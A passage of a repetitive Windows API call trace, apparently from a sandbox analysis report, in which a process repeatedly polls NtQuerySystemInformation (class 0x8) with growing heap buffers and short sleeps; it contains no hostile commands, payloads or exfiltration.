SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0182.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0182.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.660] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0182.660] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0182.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.661] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0182.662] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.663] Sleep (dwMilliseconds=0x110) [0182.714] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0182.714] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.715] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0182.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0182.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0182.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0182.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0182.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.723] Sleep (dwMilliseconds=0x110) [0182.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0182.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0182.957] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.958] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0182.958] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.959] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0182.959] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0182.959] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.960] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0182.961] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.961] Sleep (dwMilliseconds=0x110) [0183.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0183.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0183.207] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.208] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.208] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0183.208] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.209] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.209] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0183.209] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0183.210] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.210] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0183.211] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.211] Sleep (dwMilliseconds=0x110) [0183.261] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0183.261] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.262] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0183.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0183.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0183.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0183.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.273] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0183.274] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.275] Sleep (dwMilliseconds=0x110) [0183.286] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0183.286] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.286] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.287] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0183.287] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.288] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.288] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0183.289] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.289] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.290] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0183.290] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0183.291] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.291] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0183.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.298] Sleep (dwMilliseconds=0x110) [0183.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0183.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.318] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0183.318] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.319] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.319] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0183.319] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.320] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.320] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0183.321] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0183.321] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.321] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0183.322] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.322] Sleep (dwMilliseconds=0x110) [0183.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0183.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0183.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0183.333] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.334] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0183.334] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0183.334] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.335] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0183.336] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.336] Sleep (dwMilliseconds=0x110) [0183.372] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0183.372] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.373] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0183.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0183.379] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.380] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0183.380] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0183.381] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.381] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0183.382] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.382] Sleep (dwMilliseconds=0x110) [0183.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0183.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0183.391] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0183.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0183.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0183.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0183.399] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.399] Sleep (dwMilliseconds=0x110) [0183.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0183.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0183.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0183.614] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.614] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0183.615] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0183.615] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.615] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0183.616] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.616] Sleep (dwMilliseconds=0x110) [0183.771] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0183.771] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.771] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.772] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0183.772] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.773] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.773] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0183.773] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.774] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.777] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0183.777] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0183.778] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0183.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.781] Sleep (dwMilliseconds=0x110) [0183.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0183.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0183.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0183.848] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0183.849] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0183.849] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.849] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0183.850] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.850] Sleep (dwMilliseconds=0x110) [0183.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0183.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0183.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0183.879] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.886] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.886] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0183.886] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0183.887] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0183.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, 